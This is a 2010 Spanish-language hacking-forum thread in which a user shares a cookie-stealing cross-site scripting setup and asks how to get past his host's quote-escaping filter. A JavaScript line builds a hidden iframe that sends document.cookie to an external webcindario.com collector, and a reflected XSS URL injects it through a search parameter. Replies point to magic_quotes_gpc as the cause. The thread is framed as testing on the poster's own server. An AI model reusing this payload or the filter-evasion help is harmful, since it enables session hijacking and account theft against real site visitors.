Título: Problema con añadimiento en codigo Publicado por: Dr [F] en 29 Julio 2010, 04:42 am Hola gente miren estaba montando un servidor de pruebas y lo subi a mi@
los codigos son los siguientes: webv.php Código: <?php busca.php Código: <?php pag2.php Código: <?php cookie.js Código: document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>"); cookie.php Código: <?php esta es la url vulnerable a nivel localhost: http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script> El codigo que interpretaria busca.php seria <script src="Http://localhost/cookie.js"</script> pero mi@ es el siguiente Código: <script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script> Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ? gracias :) Título: Re: Problema con añadimiento en codigo Publicado por: Ari Slash en 29 Julio 2010, 04:55 am no se que filtro ni nada xD
pero prueba en este hosting www.zymic.com para pruebas si que es bueno saludos Título: Re: Problema con añadimiento en codigo Publicado por: Dr [F] en 29 Julio 2010, 06:20 am no pasa por que el hosting sea malo, solo tiene un pequeño filtro que quiero saber como evadirlo :)
igual gracias por la respuesta :) Título: Re: Problema con añadimiento en codigo Publicado por: Shell Root en 29 Julio 2010, 18:19 pm Código No entiendo el porque escapas las comillas dobles. No debería ser así: (Además de cerrar bien la etiqueta <script>) Código
Título: Re: Problema con añadimiento en codigo Publicado por: Dr [F] en 30 Julio 2010, 00:43 am disculpa Shell, pero no entiendo en la parte que dices que escapo de las comillas dobles :-[.
Podrias expresarte mejor ? Muchas gracias Título: Re: Problema con añadimiento en codigo Publicado por: Erfiug en 30 Julio 2010, 01:39 am si pones un backslash delante de las comillas es para indicar que quieres mostrar ese carácter (las comillas) y no para delimitar un string.
Título: Re: Problema con añadimiento en codigo Publicado por: Dr [F] en 31 Julio 2010, 23:57 pm creo que no me entendieron -.-
Código: <script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"></script> ese codigo lo añade mi arroba, yo pongo este: Código: http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script> yo no añado los backslashes, los añade mi arroba PD: Shell root, la etiqueta no esta mal cerrada, funciona de las dos maneras Título: Re: Problema con añadimiento en codigo Publicado por: ~ Yoya ~ en 1 Agosto 2010, 02:12 am Pasa que al parecer tienes la directiva magic_quotes_gpc(GET, POST, COOKIE) ON del php.ini, que escapa las comillas simples y dobles con barras invertidas...
Info: http://foro.undersecurity.net/read.php?15,6470 Título: Re: Problema con añadimiento en codigo Publicado por: Shell Root en 1 Agosto 2010, 02:13 am Código: http://www.pruebas18p/busca.php?busca=<script src="http://www.pruebas18p/cookie.js"</script> Código: <bHola</b> Título: Re: Problema con añadimiento en codigo Publicado por: Dr [F] en 1 Agosto 2010, 04:32 am miren, hagan de cuenta como que no dije nada.. dale ?
jaja muchas gracias perdon :-[ Título: Re: Problema con añadimiento en codigo Publicado por: ~ Yoya ~ en 1 Agosto 2010, 04:34 am miren, hagan de cuenta como que no dije nada.. dale ? jaja muchas gracias perdon :-[ lol, mejor piensa antes de postear... Pasa que al parecer tienes la directiva magic_quotes_gpc(GET, POST, COOKIE) ON del php.ini, que escapa las comillas simples y dobles con barras invertidas... Info: http://foro.undersecurity.net/read.php?15,6470 |